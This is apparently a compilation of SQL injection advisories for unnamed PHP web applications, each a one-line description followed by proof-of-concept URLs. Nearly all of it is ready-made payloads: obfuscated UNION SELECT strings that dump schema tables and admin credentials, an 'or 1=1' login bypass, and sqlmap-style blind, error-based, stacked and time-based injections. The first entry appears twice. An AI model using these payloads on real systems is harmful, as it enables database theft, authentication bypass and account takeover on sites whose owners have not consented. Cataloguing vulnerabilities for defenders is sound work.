The vulnerability allows an users to inject sql commands. Proof of Concept: http://localhost/[PATH]/viewprofile.php?profid=[SQL], http://localhost/[PATH]/viewmessage.php?sender_id=[SQL], -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+- and http://localhost/[PATH]/admin with Email: 'or 1=1 or ''=' Pass: anything.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/viewprofile.php?profid=[SQL], http://localhost/[PATH]/viewmessage.php?sender_id=[SQL], -263'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+0x31,0x32,(/*!08888SElEct*/+ExpOrt_sEt(5,@:=0,(/*!08888sElEct*/+cOunt(*)/*!08888frOm*/(infOrmatiOn_schEma.cOlumns)whErE@:=ExpOrt_sEt(5,ExpOrt_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888cOlumn_namE*/,0xa3a,2)),@,2)),0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136--+- and http://localhost/[PATH]/admin with Email: 'or 1=1 or ''=' Pass: anything.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/admin/members_view.php?id=[SQL] 2271+aND(/*!00033SelEcT*/+0x30783331+/*!00033frOM*/+(/*!00033SelEcT*/+cOUNT(*),/*!00033cOnCaT*/((/*!00033sELECT*/(/*!00033sELECT*/+/*!00033cOnCaT*/(cAST(dATABASE()+aS+/*!00033cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00033wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00033rAND*/(0)*2))x+/*!00033FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00033aNd*/+1=1. Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=2271 RLIKE (SELECT (CASE WHEN (8371=8371) THEN 2271 ELSE 0x28 END)). Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=2271 AND (SELECT 9357 FROM(SELECT COUNT(*),CONCAT(0x7176716a71,(SELECT (ELT(9357=9357,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a). Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: id=2271;SELECT SLEEP(5)#. Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=2271 OR SLEEP(5)
The vulnerability allows an attacker to inject sql commands. An attacker can bypass authentication by sending a crafted request with 'or 1=1 or ''=' as the username and anything as the password.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/add_to_cart.php?product_id=[SQL] Parameter: product_id (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: product_id=3 AND (SELECT 5917 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(5917=5917,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: product_id=3 AND SLEEP(5)
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/admin/editadgroup.php?groupid=[SQL] -1++/*!00009UNION*/+/*!00009SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(SELECT+GROUP_CONCAT(0x557365726e616d653a,name,0x3c62723e,0x50617373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--+- Parameter: groupid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: groupid=1 AND 3188=3188 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: groupid=1 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: groupid=1 UNION ALL SELECT CONCAT(0x71707a7071,0x754642515970647855775a494a486368477a6e45755355495050634270466969495966676b78536c,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oMUM
The vulnerability allows an attacker to inject sql commands by manipulating the 'username' parameter of the 'login' form.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL] http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL] Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5) Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=95&action=edit&id=3 AND SLEEP(5)
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/?photo=[SQL] Parameter: photo (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: photo=saSihSiRf1E' AND SLEEP(5) AND 'DUqs'='DUqs
The vulnerability allows an attacker to inject sql commands. An example of a payload is ' UNION ALL SELECT CONCAT(0x716a717071,0x766a414e736e79524546725053474f72754d764a4772697a65666a7551464b46435141414d4e616c,0x7170707071)-- hvbM'
Services By CQR